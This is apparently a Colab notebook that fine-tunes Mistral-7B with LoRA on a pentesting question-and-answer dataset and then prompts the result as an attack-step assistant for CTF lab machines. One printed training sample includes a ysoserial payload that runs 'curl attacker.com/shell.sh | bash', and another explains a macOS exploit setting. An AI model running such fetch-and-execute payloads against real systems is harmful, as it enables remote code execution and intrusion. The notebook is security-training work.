<a href="https://colab.research.google.com/github/ikramMc/PFE/blob/main/mistral_finetuning.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

# **Installing Required Packages**

In [None]:
%%capture
import os
if "COLAB_" not in "".join(os.environ.keys()):
    !pip install unsloth vllm
else:
    # [NOTE] Do the below ONLY in Colab! Use [[pip install unsloth vllm]]
    !pip install --no-deps unsloth vllm==0.8.5.post1

In [None]:
%%capture
!pip install wandb

In [None]:
#@title Colab Extra Install { display-mode: "form" }
%%capture
import os
if "COLAB_" not in "".join(os.environ.keys()):
    !pip install unsloth vllm
else:
    !pip install --no-deps unsloth vllm==0.8.5.post1
    # [NOTE] Do the below ONLY in Colab! Use [[pip install unsloth vllm]]
    # Skip restarting message in Colab
    import sys, re, requests; modules = list(sys.modules.keys())
    for x in modules: sys.modules.pop(x) if "PIL" in x or "google" in x else None
    !pip install --no-deps bitsandbytes accelerate xformers==0.0.29.post3 peft trl triton cut_cross_entropy unsloth_zoo
    !pip install sentencepiece protobuf "datasets>=3.4.1,<4.0.0" huggingface_hub hf_transfer

    # vLLM requirements - vLLM breaks Colab due to reinstalling numpy
    f = requests.get("https://raw.githubusercontent.com/vllm-project/vllm/refs/heads/main/requirements/common.txt").content
    with open("vllm_requirements.txt", "wb") as file:
        file.write(re.sub(rb"(transformers|numpy|xformers)[^\n]{1,}\n", b"", f))
    !pip install -r vllm_requirements.txt

# **Model loading and lora configuration**

In [None]:
from unsloth import FastLanguageModel
import torch
max_seq_length =4800# Choose any! We auto support RoPE Scaling internally!
dtype = None # None for auto detection. Float16 for Tesla T4, V100, Bfloat16 for Ampere+
load_in_4bit = True # Use 4bit quantization to reduce memory usage. Can be False.
model_name = "unsloth/mistral-7b-instruct-v0.3-bnb-4bit"
model, tokenizer = FastLanguageModel.from_pretrained(
    model_name =model_name,
    max_seq_length = max_seq_length,
    dtype = dtype,
    load_in_4bit = load_in_4bit,
    # token = "hf_...", # use one if using gated models like meta-llama/Llama-2-7b-hf
)

🦥 Unsloth: Will patch your computer to enable 2x faster free finetuning.
🦥 Unsloth Zoo will now patch everything to make training faster!
INFO 07-25 08:46:37 [importing.py:53] Triton module has been replaced with a placeholder.
INFO 07-25 08:46:37 [__init__.py:239] Automatically detected platform cuda.
==((====))==  Unsloth 2025.7.8: Fast Mistral patching. Transformers: 4.53.2. vLLM: 0.8.5.post1.
   \\   /|    Tesla T4. Num GPUs = 1. Max memory: 14.741 GB. Platform: Linux.
O^O/ \_/ \    Torch: 2.6.0+cu124. CUDA: 7.5. CUDA Toolkit: 12.4. Triton: 3.2.0
\        /    Bfloat16 = FALSE. FA [Xformers = 0.0.29.post3. FA2 = False]
 "-____-"     Free license: http://github.com/unslothai/unsloth
Unsloth: Fast downloading is enabled - ignore downloading bars which are red colored!


We now add LoRA adapters so we only need to update 1 to 10% of all parameters!

In [None]:
model = FastLanguageModel.get_peft_model(
    model,
    r = 64, #Choose any number > 0 ! Suggested 8, 16, 32, 64, 128
    target_modules =["q_proj", "k_proj", "v_proj", "o_proj","gate_proj", "up_proj", "down_proj",], #it was ["q_proj", "k_proj", "v_proj", "o_proj","gate_proj", "up_proj", "down_proj",], chnaged on 4/4
    lora_alpha = 128,
    lora_dropout = 0, # Supports any, but = 0 is optimized
    bias = "none",    # Supports any, but = "none" is optimized,don't train biases only weights
    # [NEW] "unsloth" uses 30% less VRAM, fits 2x larger batch sizes!
    use_gradient_checkpointing = "unsloth", # True or "unsloth" for very long context
    random_state = 3407,
    use_rslora = False,  # We support rank stabilized LoRA
    loftq_config = None, # And LoftQ
)

Unsloth 2025.7.8 patched 32 layers with 32 QKV layers, 32 O layers and 32 MLP layers.


# **Data Preparation**

We use get_chat_template function to get the correct chat template. unsloth support zephyr, chatml, mistral, llama, llama3.1 alpaca, vicuna, vicuna_old ...



In [None]:
from unsloth.chat_templates import get_chat_template

tokenizer = get_chat_template(
    tokenizer,
    chat_template = "mistral", # Supports zephyr, chatml, mistral, llama, alpaca, vicuna, vicuna_old, unsloth
    #mapping = {"role" : "from", "content" : "value", "user" : "human", "assistant" : "gpt"}, # ShareGPT style
    #map_eos_token = True, # Maps <|im_end|> to </s> instead
    #eos_token = "</s>",
)

def formatting_prompts_func(examples):
   convos = examples["conversations"]
   texts = [tokenizer.apply_chat_template(convo, tokenize = False, add_generation_prompt = False).removeprefix('<s>') for convo in convos]
   return { "text" : texts, }
pass


In [None]:
from datasets import Dataset
from unsloth.chat_templates import standardize_sharegpt
import pandas as pd
import ast

df = pd.read_csv("train.csv")

def parse_conversations(conv_str):
    try:
        return ast.literal_eval(conv_str)
    except:
        return []

# Transformer en liste de dictionnaires
dataset_list = [
    {"conversations": parse_conversations(conv)} for conv in df["conversations"]
]
hf_dataset = Dataset.from_list(dataset_list)



In [None]:
# Remove empty conversations
hf_dataset = hf_dataset.filter(
    lambda example: example["conversations"] and len(example["conversations"]) > 0
)


Filter:   0%|          | 0/10956 [00:00<?, ? examples/s]

In [None]:
print(hf_dataset[12]["conversations"])

[{'content': 'Explain how to use ysoserial to test for Java deserialization vulnerabilities.', 'role': 'user'}, {'content': "To test with ysoserial:\\n1. First identify potential injection points (parameters with serialized data)\\n2. Generate a test payload that triggers a visible action:\\n```bash\\njava -jar ysoserial.jar URLDNS http://your.dns.logger > payload.b64\\n```\\n3. Encode the payload (if needed) and inject it\\n4. Monitor for DNS callback to confirm vulnerability\\n5. For RCE, replace with appropriate gadget chain:\\n```bash\\njava -jar ysoserial.jar CommonsCollections5 'curl attacker.com/shell.sh | bash' > payload\\n```\\n6. Use URLDNS first as it's non-destructive", 'role': 'assistant'}]


We now use `standardize_sharegpt` to convert ShareGPT style datasets into HuggingFace's generic format. This changes the dataset from looking like:
```
{"from": "system", "value": "You are an assistant"}
{"from": "human", "value": "What is 2+2?"}
{"from": "gpt", "value": "It's 4."}
```
to
```
{"role": "system", "content": "You are an assistant"}
{"role": "user", "content": "What is 2+2?"}
{"role": "assistant", "content": "It's 4."}
```
in our case our data is already saved in huggingFace's generic format

In [None]:
#to hugging face formart(rule,content)
from unsloth.chat_templates import standardize_sharegpt
train_dataset = standardize_sharegpt(hf_dataset)
train_dataset = train_dataset.map(formatting_prompts_func, batched = True,)#apply the chat template

Unsloth: Standardizing formats (num_proc=2):   0%|          | 0/10956 [00:00<?, ? examples/s]

Map:   0%|          | 0/10956 [00:00<?, ? examples/s]

In [None]:
train_dataset[157]["text"]

'[INST] Write a VBS snippet that checks if a file can be created at a specified path before attempting to write. [/INST]```vbs\\nFunction CanCreateFile(strPath)\\n    Dim oFSO: Set oFSO = CreateObject("Scripting.FileSystemObject")\\n    On Error Resume Next\\n    oFSO.CreateTextFile(strPath).Close\\n    If Err.Number = 0 Then\\n        CanCreateFile = True\\n        oFSO.GetFile(strPath).Delete\\n    Else\\n        CanCreateFile = False\\n    End If\\n    On Error GoTo 0\\nEnd Function\\n```</s>'

In [None]:
df = pd.read_csv("val.csv")

def parse_conversations(conv_str):
    try:
        return ast.literal_eval(conv_str)
    except:
        return []

# Transformer en liste de dictionnaires
dataset_list = [
    {"conversations": parse_conversations(conv)} for conv in df["conversations"]
]
hf_dataset_val = Dataset.from_list(dataset_list)
#hf_dataset=hf_dataset.select(range(100))



In [None]:
#to hugging face formart(rule,content)
from unsloth.chat_templates import standardize_sharegpt
test_dataset = standardize_sharegpt( hf_dataset_val)
test_dataset = test_dataset.map(formatting_prompts_func, batched = True,)

Unsloth: Standardizing formats (num_proc=2):   0%|          | 0/601 [00:00<?, ? examples/s]

Map:   0%|          | 0/601 [00:00<?, ? examples/s]

<a name="Train"></a>
# **Train the model**
first we setup the experiment tracker wandb


In [None]:
%%capture
import wandb
import os
from google.colab import userdata
wandb_api_key=userdata.get('WANDB_API_KEY')
wandb.login(key=wandb_api_key)  # Authenticate with WandB

In [None]:
%%capture
import random
import wandb

# Start a new wandb run to track this script.
run = wandb.init(
    # Set the wandb entity where your project will be logged (generally your team name).
    entity="kimx94347-log",
    # Set the wandb project where this run will be logged.
    project="finetuning_mistral2",
    # Track hyperparameters and run metadata.

)


In [None]:
from trl import SFTTrainer,SFTConfig
from transformers import TrainingArguments, DataCollatorForSeq2Seq
from unsloth import is_bfloat16_supported

trainer = SFTTrainer(
        model=model,
        tokenizer=tokenizer,
        train_dataset=train_dataset,
        eval_dataset=test_dataset,
        dataset_text_field="text",  # Adjust if your field name is different
        max_seq_length=max_seq_length,
        data_collator=DataCollatorForSeq2Seq(tokenizer=tokenizer),
        dataset_num_proc=2,
        #group_by_length=True,
        packing=False,  # Can make training 5x faster for short sequences
        args=SFTConfig(
            per_device_train_batch_size=8,
            per_device_eval_batch_size=8,
            gradient_accumulation_steps=8,
            dataloader_drop_last=True,
           # max_grad_norm=2.0,
            warmup_steps=5,
            num_train_epochs=3,
            learning_rate=9e-5,
            eval_strategy="steps",
            eval_steps=20,
            fp16=not is_bfloat16_supported(),
            bf16=is_bfloat16_supported(),
            logging_steps=1,
            optim="adamw_8bit",
            weight_decay=0.01,
            lr_scheduler_type="cosine",
            seed=3407,
            output_dir="outputs_mistral",  # Path to save model checkpoints
            save_strategy="epoch",  # Save model after each epoch
            save_total_limit=7,  # Keep only the last 3 checkpoints
            report_to="wandb",  # Use this for WandB etc.
        ),
  )

Unsloth: Tokenizing ["text"] (num_proc=2):   0%|          | 0/10956 [00:00<?, ? examples/s]

Unsloth: Tokenizing ["text"] (num_proc=2):   0%|          | 0/601 [00:00<?, ? examples/s]

# **extra steps to train on responses only(calculate loss only on the responses part)**

In [None]:
from unsloth.chat_templates import train_on_responses_only
trainer = train_on_responses_only(
    trainer,
    instruction_part = "[INST]",
    response_part = "[/INST]",
)

Map (num_proc=2):   0%|          | 0/10956 [00:00<?, ? examples/s]

Map (num_proc=2):   0%|          | 0/601 [00:00<?, ? examples/s]

test if the function is working correctly

In [None]:
tokenizer.decode(trainer.train_dataset[48]["input_ids"])

'<s>[INST] Why is setting `OBJC_DISABLE_INITIALIZE_FORK_SAFETY=YES` necessary for some PID reuse exploits? [/INST]macOS has safety mechanisms that prevent `fork()` from being used in Objective-C programs due to potential instability. Setting this environment variable disables these checks, allowing the exploit to create child processes via `fork()` without crashing. Alternatively, the exploit can include an assembly directive (`.section __DATA,__objc_fork_ok`) to achieve the same effect.</s>'

In [None]:
space = tokenizer(" ", add_special_tokens = False).input_ids[0]
tokenizer.decode([space if x == -100 else x for x in trainer.train_dataset[48]["labels"]])

'                                       macOS has safety mechanisms that prevent `fork()` from being used in Objective-C programs due to potential instability. Setting this environment variable disables these checks, allowing the exploit to create child processes via `fork()` without crashing. Alternatively, the exploit can include an assembly directive (`.section __DATA,__objc_fork_ok`) to achieve the same effect.</s>'

We can see the Instruction prompts are successfully masked!

In [None]:
#@title Show current memory stats
gpu_stats = torch.cuda.get_device_properties(0)
start_gpu_memory = round(torch.cuda.max_memory_reserved() / 1024 / 1024 / 1024, 3)
max_memory = round(gpu_stats.total_memory / 1024 / 1024 / 1024, 3)
print(f"GPU = {gpu_stats.name}. Max memory = {max_memory} GB.")
print(f"{start_gpu_memory} GB of memory reserved.")

GPU = Tesla T4. Max memory = 14.741 GB.
6.883 GB of memory reserved.


# **Start the trainer**

In [None]:
import os
os.environ["LD_LIBRARY_PATH"] = os.path.expanduser("~/lib") + ":" + os.environ.get("LD_LIBRARY_PATH", "")
os.environ["LIBRARY_PATH"] = os.path.expanduser("~/lib") + ":" + os.environ.get("LIBRARY_PATH", "")

trainer_stats = trainer.train()

==((====))==  Unsloth - 2x faster free finetuning | Num GPUs used = 1
   \\   /|    Num examples = 10,956 | Num Epochs = 3 | Total steps = 516
O^O/ \_/ \    Batch size per device = 8 | Gradient accumulation steps = 8
\        /    Data Parallel GPUs = 1 | Total batch size (8 x 8 x 1) = 64
 "-____-"     Trainable parameters = 167,772,160 of 7,415,795,712 (2.26% trained)


Unsloth: Will smartly offload gradients to save VRAM!


Step,Training Loss,Validation Loss


In [None]:
#@title Show final memory and time stats
used_memory = round(torch.cuda.max_memory_reserved() / 1024 / 1024 / 1024, 3)
used_memory_for_lora = round(used_memory - start_gpu_memory, 3)
used_percentage = round(used_memory         /max_memory*100, 3)
lora_percentage = round(used_memory_for_lora/max_memory*100, 3)
print(f"{trainer_stats.metrics['train_runtime']} seconds used for training.")
print(f"{round(trainer_stats.metrics['train_runtime']/60, 2)} minutes used for training.")
print(f"Peak reserved memory = {used_memory} GB.")
print(f"Peak reserved memory for training = {used_memory_for_lora} GB.")
print(f"Peak reserved memory % of max memory = {used_percentage} %.")
print(f"Peak reserved memory for training % of max memory = {lora_percentage} %.")

<a name="Inference"></a>
### **Inference**


In [None]:
#INSTRUCT
FastLanguageModel.for_inference(model) # Enable native 2x faster inference

messages = [
 {'content': ' i am playing a ctf what should i do next: nmap -p 21,22,80 -sCV -oA scans/nmap-tcpscripts 10.10.10.249\nStarting Nmap 7.91 ( https://nmap.org ) at 2021-07-17 15:13 EDT\nNmap scan report for 10.10.10.249\nHost is up (0.024s latency).\n\nPORT   STATE SERVICE VERSION\n21/tcp open  ftp     vsftpd 3.0.3\n22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n|   2048 17:e1:13:fe:66:6d:26:b6:90:68:d0:30:54:2e:e2:9f (RSA)\n|   256 92:86:54:f7:cc:5a:1a:15:fe:c6:09:cc:e5:7c:0d:c3 (ECDSA)\n|_  256 f4:cd:6f:3b:19:9c:cf:33:c6:6d:a5:13:6a:61:01:42 (ED25519)\n80/tcp open  http    nginx 1.14.2\n|_http-server-header: nginx/1.14.2\n|_http-title: Pikaboo\nService Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel\n\nService detection performed. Please report any incorrect results at https://nmap.org/submit/ .\nNmap done: 1 IP address (1 host up) scanned in 8.15 seconds',
  'role': 'user'},

]
inputs = tokenizer.apply_chat_template(
    messages,
    tokenize = True,
    add_generation_prompt = True, # Must add for generation
    return_tensors = "pt",
).to("cuda")

from transformers import TextStreamer
text_streamer = TextStreamer(tokenizer, skip_prompt = True)
_ = model.generate(input_ids = inputs, streamer = text_streamer, max_new_tokens = 256,
                   use_cache = True, temperature = 0.7, min_p = 0.1)

<a name="Save"></a>
### Saving, loading finetuned models
To save the final model as LoRA adapters, either use Huggingface's `push_to_hub` for an online save or `save_pretrained` for a local save.

**[NOTE]** This ONLY saves the LoRA adapters, and not the full model. To save to 16bit or GGUF, scroll down!

In [None]:
from huggingface_hub import login
from transformers import AutoModelForCausalLM, AutoTokenizer
from google.colab import userdata
hf_token=userdata.get('HF_TOKEN')

model_name="kimxxxx/mistral_r64_a128_b8_gas8_lr9e-5_4500tk_3epoch"
model_location="outputs_mistral/checkpoint-504"
model = AutoModelForCausalLM.from_pretrained(model_location)
tokenizer = AutoTokenizer.from_pretrained(model_location)

model.push_to_hub(model_name, token = hf_token)
tokenizer.push_to_hub(model_name, token = hf_token)

In [None]:
from transformers import TextStreamer
text_streamer = TextStreamer(tokenizer, skip_prompt = True)
messages = [
    {
        "role": "system",
        "content": "you are a professional pentest assistant ,running in a virtual environement ,given the context below you shouldalways suggest the next attack step,give only the next step don't explain too much the given context.you're also provided with a history that show the previous observation and actions .",
    },
    {"role": "user", "content": "the victim machine address :10.10.10.249?"},
    {'content': 'port scanning :\nnmap -p- --min-rate 10000 -oA scans/nmap-alltcp 10.10.10.249',
  'role': 'assistant'},
 {'content': 'nmap -p- --min-rate 10000 -oA scans/nmap-alltcp 10.10.10.249\nStarting Nmap 7.91 ( https://nmap.org ) at 2021-07-17 15:10 EDT\nNmap scan report for 10.10.10.249\nHost is up (0.095s latency).\nNot shown: 65532 closed ports\nPORT   STATE SERVICE\n21/tcp open  ftp\n22/tcp open  ssh\n80/tcp open  http\n\nNmap done: 1 IP address (1 host up) scanned in 171.09 seconds\n',
  'role': 'user'},
 ]
tokenized_chat = tokenizer.apply_chat_template(messages, tokenize=True, add_generation_prompt=True, return_tensors="pt").to("cuda")
print(tokenizer.decode(tokenized_chat[0]))
outputs = model.generate(tokenized_chat, streamer = text_streamer, max_new_tokens = 512,
                 use_cache = True, temperature = 0.7, min_p = 0.1)

#_ = model.generate(tokenized_chat, streamer = text_streamer, max_new_tokens = 512,
#                  use_cache = True, temperature = 0.7, min_p = 0.1)

# **TESTS**

In [None]:
if False:
    from unsloth import FastLanguageModel
    max_seq_length = 2048 # Choose any! We auto support RoPE Scaling internally!
    dtype = None # None for auto detection. Float16 for Tesla T4, V100, Bfloat16 for Ampere+
    load_in_4bit = True # Use 4bit quantization to reduce memory usage. Can be False.
    model1, tokenizer1 = FastLanguageModel.from_pretrained(
        model_name = "kimxxxx/llama-3-8b_separated_21-3_1400", # YOUR MODEL YOU USED FOR TRAINING
        max_seq_length = max_seq_length,
        dtype = dtype,
        load_in_4bit = load_in_4bit,
    )
    FastLanguageModel.for_inference(model1)
if True:
    from unsloth import FastLanguageModel
    max_seq_length = 2048 # Choose any! We auto support RoPE Scaling internally!
    dtype = None # None for auto detection. Float16 for Tesla T4, V100, Bfloat16 for Ampere+
    load_in_4bit = True # Use 4bit quantization to reduce memory usage. Can be False.
    model2, tokenizer2 = FastLanguageModel.from_pretrained(
        model_name = "kimxxxx/llama-3-8b_separated_22-3_1400_hyperparam_change", # YOUR MODEL YOU USED FOR TRAINING
        max_seq_length = max_seq_length,
        dtype = dtype,
        load_in_4bit = load_in_4bit,
    )
    FastLanguageModel.for_inference(model2)
if False:
    from unsloth import FastLanguageModel
    max_seq_length = 2048 # Choose any! We auto support RoPE Scaling internally!
    dtype = None # None for auto detection. Float16 for Tesla T4, V100, Bfloat16 for Ampere+
    load_in_4bit = True # Use 4bit quantization to reduce memory usage. Can be False.
    model3, tokenizer3 = FastLanguageModel.from_pretrained(
        model_name = "kimxxxx/llama-3.1-8binst_multi_grouped-1epoch", # YOUR MODEL YOU USED FOR TRAINING
        max_seq_length = max_seq_length,
        dtype = dtype,
        load_in_4bit = load_in_4bit,
    )
    FastLanguageModel.for_inference(model3)
# Load the base model (same as how you loaded the fine-tuned model, but without loading LoRA weights)
base_model, _ = FastLanguageModel.from_pretrained(
    model_name="unsloth/Meta-Llama-3.1-8B", # or your base model name
    max_seq_length=2048,
    dtype=None,
    load_in_4bit=True,
)

'''FastLanguageModel.for_inference(base_model)  # Enable native 2x faster inference for base model
# Load the base model (same as how you loaded the fine-tuned model, but without loading LoRA weights)
instruct_model, _ = FastLanguageModel.from_pretrained(
    model_name="unsloth/Meta-Llama-3.1-8B-Instruct-bnb-4bit", # or your base model name
    max_seq_length=2048,
    dtype=None,
    load_in_4bit=True,
)

FastLanguageModel.for_inference(instruct_model)
'''

In [None]:
import csv
import torch
from transformers import TextStreamer

# Define model parameters
temperature = 0.7
max_tokens = 128

# List of test questions
questions = [
    "Hello, how are you?",
    "What is the capital of Algeria?",
    "What is a famous tall tower in Paris?",
    "Who were the main scientists behind the discovery of DNA?",
    "The pentest target IP Address this time is: 10.10.18.250",
    "I'm conducting a pentesting and I found this:\n"
    "$ gobuster dir -w $WORDLISTS/dirbuster/directory-list-2.3-medium.txt -q -u http://spider.htb\n"
    "/index                (Status: 200) [Size: 11273]\n"
    "/login                (Status: 200) [Size: 1832]\n"
    "/register             (Status: 200) [Size: 2130]\n"
    "/main                 (Status: 302) [Size: 219] [--> http://spider.htb/login]\n"
    "/user                 (Status: 302) [Size: 219] [--> http://spider.htb/login]\n"
    "/view                 (Status: 302) [Size: 219] [--> http://spider.htb/login]\n"
    "/cart                 (Status: 500) [Size: 290]\n"
    "/logout               (Status: 302) [Size: 209] [--> http://spider.htb/]\n"
    "/checkout             (Status: 500) [Size: 290]\n"
    "What should I do next?",
    "What is the capital of Japan?\n\nA) Beijing\nB) Seoul\nC) Tokyo\nD) Bangkok",
    "A ball is dropped from a height of 20 meters. Ignoring air resistance, approximately how long does it take to reach the ground? (Use g=9.8 m/s²)\n\n"
    "A) 1.5 seconds\nB) 2.0 seconds\nC) 2.5 seconds\nD) 3.0 seconds"
]

# Define the prompt template
alpaca_prompt = """You are a very helpful assistant.
### Input:
{}

### Response:
{}"""

# Open a CSV file to store results
with open("model_responses.csv", "w", newline="", encoding="utf-8") as csvfile:
    csv_writer = csv.writer(csvfile)
    csv_writer.writerow(["Question", "Fine-Tuned Model Output", "Base Model Output"])  # Column headers

    # Iterate over each question
    for prompt in questions:
        formatted_prompt = alpaca_prompt.format(prompt, "")

        # Tokenize the input
        inputs = tokenizer2(
            [formatted_prompt],
            return_tensors="pt"
        ).to("cuda")

        text_streamer = TextStreamer(tokenizer2)

        # Generate response using the fine-tuned model
        print("\nFine-tuned Model Output:")
        fine_tuned_response = model2.generate(
            **inputs,
            streamer=text_streamer,
            temperature=temperature,
            max_new_tokens=max_tokens
        )

        # Generate response using the base model
        print("\nBase Model Output:")
        base_response = base_model.generate(
            **inputs,
            streamer=text_streamer,
            temperature=temperature,
            max_new_tokens=max_tokens
        )

        # Decode responses
        fine_tuned_text = tokenizer2.decode(fine_tuned_response[0], skip_special_tokens=True)
        base_text = tokenizer2.decode(base_response[0], skip_special_tokens=True)

        # Write results to CSV
        csv_writer.writerow([prompt, fine_tuned_text, base_text])

print("\n✅ All responses saved to 'model_responses.csv'.")


In [None]:
#if you have one question
# Make temperature a variable
temperature = 0.7 # You can adjust this value as needed
max_tokens=128
# Load the base model (same as how you loaded the fine-tuned model, but without loading LoRA weights)
#alpaca_prompt = """The following are multiple choice questions (with answers) about high school computer science.
prompt='''A ball is dropped from a height of 20 meters. Ignoring air resistance, approximately how long does it take to reach the ground? (Use g=9.8 m/s2g=9.8m/s2)

A) 1.5 seconds
B) 2.0 seconds
C) 2.5 seconds
D) 3.0 seconds
answer only with the letter of the correct answer(A or B or C or D)'''
alpaca_prompt = """you are a very helpful assistant
### Input:
{}

### Response:
{}"""

inputs = tokenizer1(
[
    alpaca_prompt.format(prompt
      , # input
        "", # output - leave this blank for generation!
    )
], return_tensors = "pt").to("cuda")

from transformers import TextStreamer
text_streamer = TextStreamer(tokenizer1)

# Generate with your fine-tuned model
print("Fine-tuned Model with high leanring rate and 3epochs Output:")
_ = model1.generate(**inputs, streamer=text_streamer, temperature=temperature, max_new_tokens=max_tokens)

'''print("Fine-tuned Model withafter lowering the leanring rate and 4epochs Output:")
_ = model2.generate(**inputs, streamer=text_streamer, temperature=temperature, max_new_tokens=max_tokens)
'''
# Now, let's prompt the base model (assuming you have it loaded as `base_model`)
print("\nBase Model Output:")
_ = base_model.generate(**inputs, streamer=text_streamer, temperature=temperature, max_new_tokens=max_tokens)

# Now, let's prompt the base model (assuming you have it loaded as `base_model`)
'''print("\ninstruct Model Output:")
_ = instruct_model.generate(**inputs, streamer=text_streamer, temperature=temperature, max_new_tokens=max_tokens)


messages = [
    {"role": "user", prompt},
]
inputs = tokenizer3.apply_chat_template(
    messages,
    tokenize = True,
    add_generation_prompt = True, # Must add for generation
    return_tensors = "pt",
).to("cuda")

from transformers import TextStreamer
text_streamer = TextStreamer(tokenizer3, skip_prompt = True)
print("\ngrouped data finetuning (10steps):")
_ = model3.generate(input_ids = inputs, streamer = text_streamer, max_new_tokens = max_tokens,
                   use_cache = True, temperature = temperature, min_p = 0.1)
'''
